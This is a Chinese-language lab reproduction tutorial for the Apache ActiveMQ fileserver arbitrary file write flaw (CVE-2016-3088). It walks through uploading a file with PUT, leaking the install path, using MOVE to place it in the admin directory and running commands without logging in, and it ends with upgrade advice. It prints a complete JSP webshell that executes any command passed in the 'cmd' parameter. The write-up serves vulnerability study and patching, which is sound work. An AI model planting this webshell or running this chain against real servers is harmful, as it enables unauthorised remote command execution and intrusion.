目錄
- 一、漏洞描述
- 二、漏洞影響版本
- 三、漏洞環(huán)境搭建
- 四、漏洞復(fù)現(xiàn)
- 五、漏洞防御
一、漏洞描述
該漏洞出現(xiàn)在fileserver應(yīng)用中,漏洞原理:ActiveMQ中的fileserver服務(wù)允許用戶通過HTTP PUT方法上傳文件到指定目錄。Fileserver支持寫入文件(不解析jsp),但是支持移動(dòng)文件(Move)我們可以將jsp的文件PUT到Fileserver下,然后再通過Move指令移動(dòng)到可執(zhí)行目錄下訪問。
二、漏洞影響版本
Apache ActiveMQ 5.0.0 - 5.13.2
三、漏洞環(huán)境搭建
1、官網(wǎng)下載apache-activemq-5.7.0-bin.tar 下載地址:http://activemq.apache.org/download-archives.html
2、解壓
3、啟動(dòng),進(jìn)入bin目錄下,運(yùn)行./activemq start
![](/d/20211016/385bdba48231699c6709dfa9436d20d6.gif)
4、瀏覽器訪問http://192.168.10.149:8161/,如下圖可以看到成功搭建環(huán)境
![](/d/20211016/336aa79e016f165773978114bf94b4de.gif)
四、漏洞復(fù)現(xiàn)
1、PUT上傳一個(gè)jsp的webshell到fileserver目錄,下圖可以看到成功上傳jsp文件
Jsp文件內(nèi)容:
<%@ page import="java.io.*"%>
<%
out.print("Hello</br>");
String strcmd=request.getParameter("cmd");
String line=null;
Process p=Runtime.getRuntime().exec(strcmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null){
out.print(line+"</br>");
}
%>
![](/d/20211016/8382a082f387c6d3342a3f3af107f92b.gif)
2、瀏覽器訪問http://192.168.10.149:8161/fileserver/1.jsp,下圖可以看到fileserver目錄下的webshell沒有被解析,說明fileserver目錄沒有執(zhí)行權(quán)限
![](/d/20211016/68b24c3d38f8ac8a476a294460a30377.gif)
3、利用該版本存在物理路徑泄露漏洞,爆一下絕對(duì)路徑
![](/d/20211016/e880c431628bb98d87512c5364223522.gif)
4、利用Move方法將webshell移入admin目錄下,如下圖所示成功把文件移入到admin目錄
![](/d/20211016/ce6911ab9312f38d280ad59c6e215cf8.gif)
5、利用該版本存在的未授權(quán)訪問漏洞,不用登錄,訪問http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下圖可以看到成功執(zhí)行命令
![](/d/20211016/68dd172d33434a170f6d8df06b65919c.gif)
五、漏洞防御
1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建議用戶升級(jí)至 5.14.0 及其以后版本。
---------------------------------------------------------------------------------
參考: https://www.secpulse.com/archives/60064.html
總結(jié)
以上所述是小編給大家介紹的Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復(fù)現(xiàn),希望對(duì)大家有所幫助,如果大家有任何疑問請(qǐng)給我留言,小編會(huì)及時(shí)回復(fù)大家的。在此也非常感謝大家對(duì)腳本之家網(wǎng)站的支持!
如果你覺得本文對(duì)你有幫助,歡迎轉(zhuǎn)載,煩請(qǐng)注明出處,謝謝!